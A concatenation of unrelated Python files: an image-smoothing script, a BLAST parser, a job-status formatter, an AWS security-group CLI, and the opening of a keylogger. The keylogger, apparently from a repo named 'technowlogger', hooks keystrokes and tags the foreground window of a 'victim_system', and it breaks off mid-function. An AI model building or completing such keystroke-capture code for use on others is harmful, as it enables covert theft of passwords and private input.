plt.waitforbuttonpress(0)
plt.close()
return S_out
def main(args):
ckpt_path = args.ckpt_path
img_path = args.img_path
[S, h, v] = get_outputs(ckpt_path, img_path, args.gpu)
h = h * SCALE_INPUT
v = v * SCALE_INPUT
beta = 8.388608e+1 / 2.
S_in = S
psf = np.asarray([[-1, 1]])
out_size = (S.shape[0], S.shape[1])
otfx = psf2otf(psf, out_size)
psf = np.asarray([[-1], [1]])
otfy = psf2otf(psf, out_size)
Normin1 = fft2(np.squeeze(S), axes=(0, 1))
Denormin2 = np.square(abs(otfx)) + np.square(abs(otfy))
Denormin2 = Denormin2[..., np.newaxis]
Denormin2 = np.repeat(Denormin2, 3, axis=2)
Denormin = 1 + beta * Denormin2
h_diff = -np.diff(h, axis=1)
first_col = h[:, -1, :] - h[:, 0, :]
first_col = first_col[:, np.newaxis, :]
h_diff = np.hstack([first_col, h_diff])
v_diff = -np.diff(v, axis=0)
first_row = v[-1, ...] - v[0, ...]
first_row = first_row[np.newaxis, ...]
v_diff = np.vstack([first_row, v_diff])
Normin2 = h_diff + v_diff
# Normin2 = beta * np.fft.fft2(Normin2, axes=(0, 1))
Normin2 = beta * fft2(Normin2, axes=(0, 1))
Normin1 = fft2(np.squeeze(S), axes=(0, 1))
FS = np.divide(np.squeeze(Normin1) + np.squeeze(Normin2),
Denormin)
# S = np.real(np.fft.ifft2(FS, axes=(0, 1)))
S = np.real(ifft2(FS, axes=(0, 1)))
S = np.squeeze(S)
S = np.clip(S, 0, 1)
S = S * 255
S = S.astype(np.uint8)
cv2.imwrite('output.png', S)
S = cv2.cvtColor(S, cv2.COLOR_BGR2RGB)
S_in = S_in * 255
S_in = S_in.astype(np.uint8)
S_in = cv2.cvtColor(S_in, cv2.COLOR_BGR2RGB)
plt.imshow(np.hstack((S_in, S)))
plt.draw()
plt.waitforbuttonpress(0)
plt.close()
def get_args():
"""get specific args for testings"""
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'--ckpt_path',
type=str,
help='ckpt path')
parser.add_argument('--gpu', action='store_false', help='gpu/cpu')
parser.add_argument(
'--img_path',
type=str,
help='image path')
return parser.parse_args()
if __name__ == "__main__":
main(get_args())
|
<reponame>ad3002/Lyrebird
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#@created: 07.09.2011
#@author: <NAME>
#@contact: <EMAIL>
from PyExp import AbstractModel
from trseeker.seqio.tab_file import sc_iter_tab_file
class BlastResultModel(AbstractModel):
""" Class for blast result data.
Attributes:
- "query_id" (int),
- "query_gi" (int),
- "query_ref",
- "subject_id",
- "subject_gi"(int),
- "subject_ref",
- "query_start" (int),
- "query_end" (int),
- "subject_start" (int),
- "subject_end" (int),
- "evalue" (float),
- "bit_score" (flaot),
- "score" (int),
- "alignment_length" (int),
- "proc_identity" (float),
- "identical" (int),
- "mismatches" (int),
- "positives" (int),
- "gap_opens" (int),
- "gaps" (int),
- "proc_positives" (float),
- "frames",
- "query_frame" (int),
- "subject_frame" (int),
- "fraction_of_query" (float),
"""
dumpable_attributes = ["query_id",
"query_gi",
"query_ref",
"subject_id",
"subject_gi",
"subject_ref",
"query_start",
"query_end",
"subject_start",
"subject_end",
"evalue",
"bit_score",
"score",
"alignment_length",
"proc_identity",
"identical",
"mismatches",
"positives",
"gap_opens",
"gaps",
"proc_positives",
"frames",
"query_frame",
"subject_frame",
"fraction_of_query",
]
int_attributes = ["query_start",
"query_end",
"subject_start",
"subject_end",
"score",
"alignment_length",
"identical",
"mismatches",
"positives",
"gap_opens",
"gaps",
"query_frame",
"subject_frame",
]
float_attributes = [ "evalue",
"proc_identity",
"proc_positives",
"fraction_of_query",
"bit_score",
]
def read_blast_file(blast_file, length):
""" Read blast file. Return subject_ref -> list of matches (BlastResultModel models)."""
#TODO: move it to readers
gi_to_results = {}
# remove # lines from blast file.
data = []
with open(blast_file) as fh:
for line in fh:
if line.startswith("#"):
continue
data.append(line)
if not data:
return gi_to_results
data[-1] = data[-1].strip()
with open(blast_file, "w") as fh:
fh.writelines(data)
# parser data
for blast_obj in sc_iter_tab_file(blast_file, BlastResultModel):
if blast_obj.query_end is None or blast_obj.query_end is None:
print "Error parsing blast results:", blast_obj
continue
if length:
blast_obj.fraction_of_query = abs(blast_obj.query_start - blast_obj.query_end) / float(length)
subject_ref = blast_obj.subject_ref
gi_to_results.setdefault(subject_ref, [])
gi_to_results[subject_ref].append(blast_obj)
return gi_to_results
|
import abc
import datetime
import itertools
import sys
import time
from dataclasses import dataclass
from types import TracebackType
from typing import Callable, Dict, Iterable, List, Optional, Tuple, Type
import humanize
from rich import box
from rich.console import Console, ConsoleRenderable, RenderableType, RenderHook
from rich.control import Control
from rich.live_render import LiveRender
from rich.markup import escape as rich_escape
from rich.styled import Styled
from rich.table import Table
from rich.text import Text, TextType
from neuro_sdk import JobDescription, JobRestartPolicy, JobStatus, JobTelemetry
from neuro_cli.formatters.utils import DatetimeFormatter
from neuro_cli.parse_utils import JobTableFormat, JobTelemetryKeyFunc
from neuro_cli.utils import format_size
from .utils import (
ImageFormatter,
URIFormatter,
format_timedelta,
image_formatter,
no,
yes,
)
COLORS = {
JobStatus.PENDING: "cyan",
JobStatus.SUSPENDED: "magenta",
JobStatus.RUNNING: "blue",
JobStatus.SUCCEEDED: "green",
JobStatus.CANCELLED: "yellow",
JobStatus.FAILED: "red",
JobStatus.UNKNOWN: "bright_red",
}
if sys.platform == "win32":
SPINNER = itertools.cycle(r"-\|/")
else:
SPINNER = itertools.cycle("◢◣◤◥")
def fmt_status(status: JobStatus) -> Text:
color = COLORS.get(status, "none")
return Text(status.value, style=color)
def get_lifespan_ends(job: JobDescription) -> Optional[datetime.datetime]:
if (
job.status
in [
JobStatus.PENDING,
JobStatus.RUNNING,
JobStatus.SUSPENDED,
]
and job.life_span
):
life_span = datetime.timedelta(seconds=job.life_span)
run_time = datetime.timedelta(seconds=job.history.run_time_seconds or 0)
runtime_left = life_span - run_time
runtime_ends = datetime.datetime.now(datetime.timezone.utc) + runtime_left
return runtime_ends
return None
class JobStatusFormatter:
def __init__(
self, uri_formatter: URIFormatter, datetime_formatter: DatetimeFormatter
) -> None:
self._format_uri = uri_formatter
self._datetime_formatter = datetime_formatter
self._format_image = image_formatter(uri_formatter=uri_formatter)
def __call__(self, job_status: JobDescription) -> RenderableType:
assert job_status.history is not None
table = Table(box=None, show_header=False, show_edge=False)
table.add_column()
table.add_column(style="bold")
table.add_row("Job", job_status.id)
if job_status.name:
table.add_row("Name", job_status.name)
if job_status.tags:
text = ", ".join(job_status.tags)
table.add_row("Tags", text)
table.add_row("Owner", job_status.owner or "")
table.add_row("Cluster", job_status.cluster_name)
if job_status.org_name:
table.add_row("Organization", job_status.org_name)
if job_status.description:
table.add_row("Description", job_status.description)
status_text = fmt_status(job_status.status)
if job_status.history.reason:
status_text = Text.assemble(status_text, f" ({job_status.history.reason})")
table.add_row("Status", status_text)
table.add_row("Image", self._format_image(job_status.container.image))
if job_status.container.entrypoint:
table.add_row("Entrypoint", job_status.container.entrypoint)
if job_status.container.command:
table.add_row("Command", job_status.container.command)
if job_status.container.working_dir:
table.add_row("Working dir", job_status.container.working_dir)
if job_status.preset_name:
table.add_row("Preset", job_status.preset_name)
table.add_row("Priority", f"{job_status.priority.name.capitalize()}")
table.add_row(
"Price (credits / hour)", f"{job_status.price_credits_per_hour:.4f}"
)
table.add_row("Current cost", f"{job_status.total_price_credits:.4f}")
resources = Table(box=None, show_header=False, show_edge=False)
resources.add_column()
resources.add_column(style="bold", justify="right")
resources.add_row(
"Memory", format_size(job_status.container.resources.memory_mb * 1024**2)
)
resources.add_row("CPU", f"{job_status.container.resources.cpu:0.1f}")
if job_status.container.resources.gpu:
resources.add_row(
"GPU",
f"{job_status.container.resources.gpu:0.1f} x "
f"{job_status.container.resources.gpu_model}",
)
if job_status.container.resources.tpu_type:
resources.add_row(
"TPU",
f"{job_status.container.resources.tpu_type}/"
"{job_status.container.resources.tpu_software_version}",
)
if job_status.container.resources.shm:
resources.add_row("Extended SHM space", "True")
table.add_row("Resources", Styled(resources, style="reset"))
if job_status.scheduler_enabled:
table.add_row("Round Robin", "True")
if job_status.preemptible_node:
table.add_row("Preemptible Node", "True")
if job_status.restart_policy != JobRestartPolicy.NEVER:
table.add_row("Restart policy", job_status.restart_policy.value)
if job_status.history.restarts != 0:
table.add_row("Restarts", str(job_status.history.restarts))
if job_status.life_span is not None:
table.add_row("Life span", format_life_span(job_status.life_span))
table.add_row("TTY", str(job_status.container.tty))
if job_status.container.volumes:
volumes = Table(box=None, show_header=False, show_edge=False)
volumes.add_column("")
volumes.add_column("")
volumes.add_column("")
for volume in job_status.container.volumes:
volumes.add_row(
volume.container_path,
self._format_uri(volume.storage_uri),
"READONLY" if volume.read_only else " ",
)
table.add_row("Volumes", Styled(volumes, style="reset"))
if job_status.container.secret_files:
secret_files = Table(box=None, show_header=False, show_edge=False)
secret_files.add_column("")
secret_files.add_column("")
for secret_file in job_status.container.secret_files:
secret_files.add_row(
secret_file.container_path, self._format_uri(secret_file.secret_uri)
)
table.add_row("Secret files", Styled(secret_files, style="reset"))
if job_status.container.disk_volumes:
disk_volumes = Table(box=None, show_header=False, show_edge=False)
disk_volumes.add_column("")
disk_volumes.add_column("")
disk_volumes.add_column("")
for disk_volume in job_status.container.disk_volumes:
disk_volumes.add_row(
disk_volume.container_path,
self._format_uri(disk_volume.disk_uri),
"READONLY" if disk_volume.read_only else " ",
)
table.add_row("Disk volumes", Styled(disk_volumes, style="reset"))
if job_status.internal_hostname:
table.add_row("Internal Hostname", job_status.internal_hostname)
if job_status.internal_hostname_named:
table.add_row("Internal Hostname Named", job_status.internal_hostname_named)
if job_status.http_url:
table.add_row("Http URL", str(job_status.http_url))
if job_status.container.http:
table.add_row("Http port", str(job_status.container.http.port))
table.add_row(
"Http authentication", str(job_status.container.http.requires_auth)
)
if job_status.container.env:
environment = Table(box=None, show_header=False, show_edge=False)
environment.add_column("")
environment.add_column("")
for key, value in job_status.container.env.items():
environment.add_row(key, value)
table.add_row("Environment", Styled(environment, style="reset"))
if job_status.container.secret_env:
secret_env = Table(box=None, show_header=False, show_edge=False)
secret_env.add_column("")
secret_env.add_column("")
for key, uri in job_status.container.secret_env.items():
secret_env.add_row(key, self._format_uri(uri))
table.add_row("Secret environment", Styled(secret_env, style="reset"))
assert job_status.history.created_at is not None
table.add_row(
"Created",
self._datetime_formatter(job_status.history.created_at, precise=True),
)
if job_status.status in [
JobStatus.RUNNING,
JobStatus.SUSPENDED,
JobStatus.FAILED,
JobStatus.SUCCEEDED,
JobStatus.CANCELLED,
]:
assert job_status.history.started_at is not None
table.add_row(
"Started",
self._datetime_formatter(job_status.history.started_at, precise=True),
)
lifespan_ends = get_lifespan_ends(job_status)
if lifespan_ends:
table.add_row(
"Life span ends (approx)", self._datetime_formatter(lifespan_ends)
)
if job_status.status in [
JobStatus.CANCELLED,
JobStatus.FAILED,
JobStatus.SUCCEEDED,
]:
assert job_status.history.finished_at is not None
table.add_row(
"Finished",
self._datetime_formatter(job_status.history.finished_at, precise=True),
)
table.add_row("Exit code", str(job_status.history.exit_code))
if job_status.status == JobStatus.FAILED and job_status.history.description:
table.add_row("Description", job_status.history.description)
if job_status.history.transitions:
status_transitions = Table(box=None, show_header=True, show_edge=False)
status_transitions.add_column("Status")
status_transitions.add_column("Time")
for status_item in job_status.history.transitions:
status_text = fmt_status(status_item.status)
if status_item.reason:
status_text = Text.assemble(status_text, f" ({status_item.reason})")
status_transitions.add_row(
status_text,
self._datetime_formatter(status_item.transition_time, precise=True),
)
table.add_row(
"Status transitions", Styled(status_transitions, style="reset")
)
return table
class LifeSpanUpdateFormatter:
def __init__(self, datetime_formatter: DatetimeFormatter) -> None:
self._datetime_formatter = datetime_formatter
def __call__(self, job_status: JobDescription) -> RenderableType:
res = (
f"Updated job {job_status.id} life span to "
f"be {format_life_span(job_status.life_span)}"
)
life_span_ends = get_lifespan_ends(job_status)
if life_span_ends is not None:
res += (
f"\nLife span ends (approx): {self._datetime_formatter(life_span_ends)}"
)
return res
def format_life_span(life_span: Optional[float]) -> str:
if life_span is None:
return ""
if life_span == 0:
return "no limit"
return format_timedelta(datetime.timedelta(seconds=life_span))
class JobTelemetryFormatter(RenderHook):
def __init__(
self,
console: Console,
username: str,
sort_keys: List[Tuple[JobTelemetryKeyFunc, bool]],
columns: JobTableFormat,
image_formatter: ImageFormatter,
datetime_formatter: DatetimeFormatter,
maxrows: Optional[int] = None,
) -> None:
self._console = console
self._username = username
self.sort_keys = sort_keys
self._columns = columns
self._image_formatter = image_formatter
self._datetime_formatter = datetime_formatter
self._maxrows = maxrows
self._live_render = LiveRender(Table.grid())
self._data: Dict[str, Tuple[JobDescription, JobTelemetry]] = {}
self.changed = True
def update(self, job: JobDescription, info: JobTelemetry) -> None:
self._data[job.id] = job, info
self.changed = True
def remove(self, job_id: str) -> None:
self._data.pop(job_id, None)
self.changed = True
def render(self) -> None:
table = Table(box=box.SIMPLE_HEAVY)
_add_columns(table, self._columns)
items = list(self._data.values())
for keyfunc, reverse in reversed(self.sort_keys):
items.sort(key=keyfunc, reverse=reverse)
maxrows = self._console.size.height - 4
if self._maxrows is not None and self._maxrows < maxrows:
maxrows = self._maxrows
del items[max(maxrows, 1) :]
for job, info in items:
job_data = TabularJobRow.from_job(
job,
self._username,
image_formatter=self._image_formatter,
datetime_formatter=self._datetime_formatter,
)
telemetry_data = dict(
cpu=f"{info.cpu:.3f}",
memory=f"{info.memory:.3f}",
gpu=f"{info.gpu_duty_cycle}" if info.gpu_duty_cycle else "0",
gpu_memory=f"{info.gpu_memory:.3f}" if info.gpu_memory else "0",
)
def get(id: str) -> TextType:
if id in telemetry_data:
return telemetry_data[id]
else:
return getattr(job_data, id)
table.add_row(*_format_row(self._columns, get))
if self._console.is_terminal:
self._live_render.set_renderable(table)
with self._console:
self._console.print(Control())
else:
self._console.print(table)
self.changed = False
def process_renderables(
self, renderables: List[ConsoleRenderable]
) -> List[ConsoleRenderable]:
"""Process renderables to restore cursor and display progress."""
if self._console.is_terminal:
renderables = [
self._live_render.position_cursor(),
*renderables,
self._live_render,
]
return renderables
def __enter__(self) -> "JobTelemetryFormatter":
self._console.show_cursor(False)
self._console.push_render_hook(self)
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
self._console.line()
self._console.show_cursor(True)
self._console.pop_render_hook()
class BaseJobsFormatter:
@abc.abstractmethod
def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
pass
class SimpleJobsFormatter(BaseJobsFormatter):
def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
table = Table.grid()
table.add_column("")
for job in jobs:
table.add_row(job.id)
return table
@dataclass(frozen=True)
class TabularJobRow:
id: str
name: str
tags: str
status: Text
when: str
created: str
started: str
finished: str
image: str
owner: str
description: str
cluster_name: str
org_name: str
command: str
life_span: str
workdir: str
preset: str
@classmethod
def from_job(
cls,
job: JobDescription,
username: str,
image_formatter: ImageFormatter,
datetime_formatter: DatetimeFormatter,
) -> "TabularJobRow":
return cls(
id=job.id,
name=job.name if job.name else "",
tags=",".join(job.tags),
status=fmt_status(job.status),
when=datetime_formatter(job.history.changed_at),
created=datetime_formatter(job.history.created_at),
started=datetime_formatter(job.history.started_at),
finished=datetime_formatter(job.history.finished_at),
image=image_formatter(job.container.image),
owner=("YOU" if job.owner == username else job.owner),
description=job.description if job.description else "",
cluster_name=job.cluster_name,
org_name=job.org_name or "",
command=job.container.command if job.container.command else "",
life_span=format_life_span(job.life_span),
workdir=job.container.working_dir or "",
preset=job.preset_name or "",
)
def to_list(self, columns: JobTableFormat) -> List[TextType]:
return _format_row(columns, lambda id: getattr(self, id))
def _format_row(
columns: JobTableFormat, get: Callable[[str], TextType]
) -> List[TextType]:
result: List[TextType] = []
for column in columns:
if "/" in column.id:
cell: List[TextType] = []
for id in column.id.split("/"):
value = get(id)
if cell:
cell.append("\n ") # new line and indentation
if isinstance(value, Text):
value.stylize("italic")
else:
value = Text(value, style="italic")
cell.append(value)
result.append(Text.assemble(*cell))
else:
result.append(get(column.id))
return result
class TabularJobsFormatter(BaseJobsFormatter):
def __init__(
self,
username: str,
columns: JobTableFormat,
image_formatter: ImageFormatter,
datetime_formatter: DatetimeFormatter,
) -> None:
self._username = username
self._columns = columns
self._image_formatter = image_formatter
self._datetime_formatter = datetime_formatter
def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
table = Table(box=box.SIMPLE_HEAVY)
_add_columns(table, self._columns)
for job in jobs:
table.add_row(
*TabularJobRow.from_job(
job,
self._username,
image_formatter=self._image_formatter,
datetime_formatter=self._datetime_formatter,
).to_list(self._columns)
)
return table
class JobStartProgress:
time_factory = staticmethod(time.monotonic)
@classmethod
def create(cls, console: Console, quiet: bool) -> "JobStartProgress":
if quiet:
return JobStartProgress()
elif console.is_terminal:
return DetailedJobStartProgress(console)
return StreamJobStartProgress(console)
def begin(self, job: JobDescription) -> None:
# Quiet mode
print(job.id)
def step(self, job: JobDescription) -> None:
pass
def end(self, job: JobDescription) -> None:
pass
def _get_status_reason_message(self, job: JobDescription) -> str:
if job.history.reason:
return job.history.reason
elif job.status == JobStatus.PENDING:
return "Initializing"
return ""
def _get_status_description_message(self, job: JobDescription) -> str:
description = job.history.description or ""
if description:
return f"({description})"
return ""
def __enter__(self) -> "JobStartProgress":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
pass
def _add_columns(table: Table, columns: JobTableFormat) -> None:
column = columns[0]
table.add_column(
column.title,
style="bold",
justify=column.justify,
width=column.width,
min_width=column.min_width,
max_width=column.max_width,
)
for column in columns[1:]:
table.add_column(
column.title,
justify=column.justify,
width=column.width,
min_width=column.min_width,
max_width=column.max_width,
)
class DetailedJobStartProgress(JobStartProgress, RenderHook):
def __init__(self, console: Console) -> None:
self._time = self.time_factory()
self._prev = Text("")
self._console = console
self._spinner = SPINNER
self._live_render = LiveRender(Text())
def begin(self, job: JobDescription) -> None:
self._console.print(
f"{yes()} [b]Job ID[/b]: {rich_escape(job.id)}", markup=True
)
if job.name:
self._console.print(
f"{yes()} [b]Name[/b]: {rich_escape(job.name)}", markup=True
)
def step(self, job: JobDescription) -> None:
new_time = self.time_factory()
dt = new_time - self._time
if job.status == JobStatus.PENDING:
msg = Text("-", "yellow")
elif job.status == JobStatus.FAILED:
msg = Text("×", "red")
else:
# RUNNING or SUCCEDED
msg = Text("√", "green")
msg = Text.assemble(msg, " Status: ", fmt_status(job.status))
reason = self._get_status_reason_message(job)
if reason:
msg = Text.assemble(msg, " ", (reason, "b"))
description = self._get_status_description_message(job)
if description:
msg = Text.assemble(msg, " " + description)
if msg != self._prev:
if self._prev:
self._console.print(self._prev)
self._prev = msg
else:
msg = Text.assemble(msg, f" {next(self._spinner)} [{dt:.1f} sec]")
self._live_render.set_renderable(msg)
with self._console:
self._console.print(Control())
def end(self, job: JobDescription) -> None:
out = []
if self._prev:
self._console.print(self._prev)
empty = Text("")
self._prev = empty
self._live_render.set_renderable(empty)
if job.status != JobStatus.FAILED:
http_url = job.http_url
if http_url:
out.append(f"{yes()} [b]Http URL[/b]: {rich_escape(str(http_url))}")
if job.life_span:
limit = humanize.naturaldelta(datetime.timedelta(seconds=job.life_span))
out.append(
f"{yes()} [yellow]The job will die in {limit}.[/yellow] "
"See --life-span option documentation for details.",
)
self._console.print("\n".join(out), markup=True)
def process_renderables(
self, renderables: List[ConsoleRenderable]
) -> List[ConsoleRenderable]:
"""Process renderables to restore cursor and display progress."""
if self._console.is_terminal:
renderables = [
self._live_render.position_cursor(),
*renderables,
self._live_render,
]
return renderables
def __enter__(self) -> "JobStartProgress":
self._console.show_cursor(False)
self._console.push_render_hook(self)
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
self._console.pop_render_hook()
self._console.line()
self._console.show_cursor(True)
class StreamJobStartProgress(JobStartProgress):
def __init__(self, console: Console) -> None:
self._console = console
self._prev = ""
def begin(self, job: JobDescription) -> None:
self._console.print(f"Job ID: {job.id}")
if job.name:
self._console.print(f"Name: {job.name}")
def step(self, job: JobDescription) -> None:
msg = f"Status: {job.status}"
reason = self._get_status_reason_message(job)
if reason:
msg += " " + reason
description = self._get_status_description_message(job)
if description:
msg += " " + description
if job.status != JobStatus.PENDING:
msg += "\n"
if msg != self._prev:
self._console.print(msg)
self._prev = msg
def end(self, job: JobDescription) -> None:
pass
class JobStopProgress:
TIMEOUT = 15 * 60
time_factory = staticmethod(time.monotonic)
@classmethod
def create(cls, console: Console, quiet: bool) -> "JobStopProgress":
if quiet:
return JobStopProgress()
elif console.is_terminal:
return DetailedJobStopProgress(console)
return StreamJobStopProgress(console)
def __init__(self) -> None:
self._time = self.time_factory()
def kill(self, job: JobDescription) -> None:
pass
def detach(self, job: JobDescription) -> None:
pass
def step(self, job: JobDescription) -> bool:
# return False if timeout, True otherwise
new_time = self.time_factory()
if new_time - self._time > self.TIMEOUT:
self.timeout(job)
return False
else:
self.tick(job)
return True
def tick(self, job: JobDescription) -> None:
pass
def timeout(self, job: JobDescription) -> None:
pass
def __enter__(self) -> "JobStopProgress":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
pass
class DetailedJobStopProgress(JobStopProgress, RenderHook):
def __init__(self, console: Console) -> None:
super().__init__()
self._console = console
self._spinner = SPINNER
self._live_render = LiveRender(Text())
def _hint(self, hints: Iterable[Tuple[str, str]]) -> None:
for title, hint in hints:
self._console.print(f"{title}:", style="dim yellow")
self._console.print(f" {hint}", style="dim")
def detach(self, job: JobDescription) -> None:
self._console.line()
self._console.print(
f"{no()} [red]Terminal was detached but job is still running", markup=True
)
self._hint(
[
("Re-attach to job", f"neuro attach {job.id}"),
("Check job status", f"neuro status {job.id}"),
("Kill job", f"neuro kill {job.id}"),
("Fetch job logs", f"neuro logs {job.id}"),
]
)
def kill(self, job: JobDescription) -> None:
self._console.line()
self._console.print(f"{no()} [red]Job was killed", markup=True)
self._hint(
[
("Get job status", f"neuro status {job.id}"),
("Fetch job logs", f"neuro logs {job.id}"),
]
)
def tick(self, job: JobDescription) -> None:
new_time = self.time_factory()
dt = new_time - self._time
if job.status == JobStatus.RUNNING:
msg = (
"[yellow]-[/yellow]"
+ f" Wait for stop {next(self._spinner)} [{dt:.1f} sec]"
)
else:
msg = yes() + f" Job [b]{job.id}[/b] stopped"
self._live_render.set_renderable(Text.from_markup(msg))
with self._console:
self._console.print(Control())
def timeout(self, job: JobDescription) -> None:
self._console.line()
self._console.print("[red]× Warning !!!", markup=True)
self._console.print(
f"{no()} [red]"
"The attached session was disconnected but the job is still alive.",
markup=True,
)
self._hint(
[
("Reconnect to the job", f"neuro attach {job.id}"),
("Terminate the job", f"neuro kill {job.id}"),
]
)
def process_renderables(
self, renderables: List[ConsoleRenderable]
) -> List[ConsoleRenderable]:
"""Process renderables to restore cursor and display progress."""
if self._console.is_terminal:
renderables = [
self._live_render.position_cursor(),
*renderables,
self._live_render,
]
return renderables
def __enter__(self) -> "JobStopProgress":
self._console.show_cursor(False)
self._console.push_render_hook(self)
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
self._console.pop_render_hook()
self._console.line()
self._console.show_cursor(True)
class StreamJobStopProgress(JobStopProgress):
def __init__(self, console: Console) -> None:
super().__init__()
self._console = console
self._console.print("Wait for stopping")
def detach(self, job: JobDescription) -> None:
pass
def kill(self, job: JobDescription) -> None:
self._console.print("Job was killed")
def tick(self, job: JobDescription) -> None:
pass
def timeout(self, job: JobDescription) -> None:
self._console.print("")
self._console.print("Warning !!!")
self._console.print(
"The attached session was disconnected but the job is still alive."
)
class ExecStopProgress:
TIMEOUT = 15
time_factory = staticmethod(time.monotonic)
@classmethod
def create(cls, console: Console, quiet: bool, job_id: str) -> "ExecStopProgress":
if quiet:
return ExecStopProgress(job_id)
elif console.is_terminal:
return DetailedExecStopProgress(console, job_id)
return StreamExecStopProgress(console, job_id)
def __init__(self, job_id: str) -> None:
self._time = self.time_factory()
self._job_id = job_id
def __call__(self, running: bool) -> bool:
# return False if timeout, True otherwise
new_time = self.time_factory()
if new_time - self._time > self.TIMEOUT:
self.timeout()
return False
else:
self.tick(running)
return True
def tick(self, running: bool) -> None:
pass
def timeout(self) -> None:
pass
def __enter__(self) -> "ExecStopProgress":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
pass
class DetailedExecStopProgress(ExecStopProgress, RenderHook):
def __init__(self, console: Console, job_id: str) -> None:
super().__init__(job_id)
self._console = console
self._spinner = SPINNER
self._live_render = LiveRender(Text())
def tick(self, running: bool) -> None:
new_time = self.time_factory()
dt = new_time - self._time
if running:
msg = (
"[yellow]-[/yellow]"
+ f"Wait for stopping {next(self._spinner)} [{dt:.1f} sec]"
)
else:
msg = yes() + f" Job [b]{self._job_id}[/b] stopped"
self._live_render.set_renderable(Text.from_markup(msg))
with self._console:
self._console.print(Control())
def timeout(self) -> None:
self._console.line()
self._console.print(f"{no()} [red]Warning !!!", markup=True)
self._console.print(
f"{no()} [red]The attached session was disconnected "
"but the exec process is still alive.",
markup=True,
)
def process_renderables(
self, renderables: List[ConsoleRenderable]
) -> List[ConsoleRenderable]:
"""Process renderables to restore cursor and display progress."""
if self._console.is_terminal:
renderables = [
self._live_render.position_cursor(),
*renderables,
self._live_render,
]
return renderables
def __enter__(self) -> "ExecStopProgress":
self._console.show_cursor(False)
self._console.push_render_hook(self)
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> None:
self._console.line()
self._console.show_cursor(True)
self._console.pop_render_hook()
class StreamExecStopProgress(ExecStopProgress):
def __init__(self, console: Console, job_id: str) -> None:
super().__init__(job_id)
self._console = console
self._console.print("Wait for stopping")
def tick(self, running: bool) -> None:
pass
def timeout(self) -> None:
self._console.print()
self._console.print("Warning !!!")
self._console.print(
"The attached session was disconnected "
"but the exec process is still alive."
)
|
# -*- coding: utf-8 -*-
"""Commands for managing security groups."""
import click
from ...jobs import securitygroups as sg_jobs
from ...jobs.exceptions import AwsError
from ...jobs.exceptions import MissingKey
from ...jobs.exceptions import Non200Response
from ...jobs.exceptions import PermissionDenied
from ...jobs.exceptions import ResourceAlreadyExists
from ...jobs.exceptions import ResourceDoesNotExist
from ...jobs.exceptions import ResourceNotCreated
from ...jobs.exceptions import ResourceNotDeleted
from .. import utils
@click.group()
def securitygroups():
"""Manage security groups."""
pass
@securitygroups.command(name="list")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def list_security_groups(
profile=None,
access_key_id=None,
access_key_secret=None):
"""List security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
try:
security_groups = sg_jobs.fetch_all(aws_profile)
except PermissionDenied:
msg = "You don't have permission to view security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
if security_groups:
for security_group in security_groups:
display_name = sg_jobs.get_display_name(security_group)
click.echo(display_name)
@securitygroups.command(name="create")
@click.argument("name")
@click.option(
"--vpc",
help="A VPC name (or ID).")
@click.option(
"--tag",
multiple=True,
help="KEY:VALUE tag for the security group.")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def create_security_group(
name,
vpc=None,
tag=None,
profile=None,
access_key_id=None,
access_key_secret=None):
"""Create security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
tags = None
if tag:
tags = utils.parse_tags(tag)
try:
security_groups = sg_jobs.create(aws_profile, name, vpc, tags)
except PermissionDenied:
msg = "You don't have permission to create security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
except (ResourceDoesNotExist, ResourceAlreadyExists, ResourceNotCreated) as error:
raise click.ClickException(str(error))
if security_groups:
for security_group in security_groups:
display_name = sg_jobs.get_display_name(security_group)
click.echo(display_name)
@securitygroups.command(name="delete")
@click.argument("name")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def delete_security_group(
name,
profile=None,
access_key_id=None,
access_key_secret=None):
"""Delete security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
try:
security_groups = sg_jobs.delete(aws_profile, name)
except PermissionDenied:
msg = "You don't have permission to delete security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
except (ResourceDoesNotExist, ResourceNotDeleted) as error:
raise click.ClickException(str(error))
|
<reponame>krasnova19/technowlogger<filename>TestKeylogger/test_key.py
import pynput.keyboard, threading, platform
try:
import win32gui as w
except Exception:
pass
log = ""
interval = 10
victim_system = platform.system()
lastWindow = ""
def append_to_log(string):
global log
log = log + string
def process_key_press(key):
global lastWindow
current_key = ""
if victim_system == 'Windows':
try:
CurrentWindowName = w.GetWindowText(w.GetForegroundWindow())
if lastWindow != CurrentWindowName:
lastWindow = CurrentWindowName
current_key = f"\n\n[OnWard Data Entered In : {CurrentWindowName}]\n"
except Exception as e:
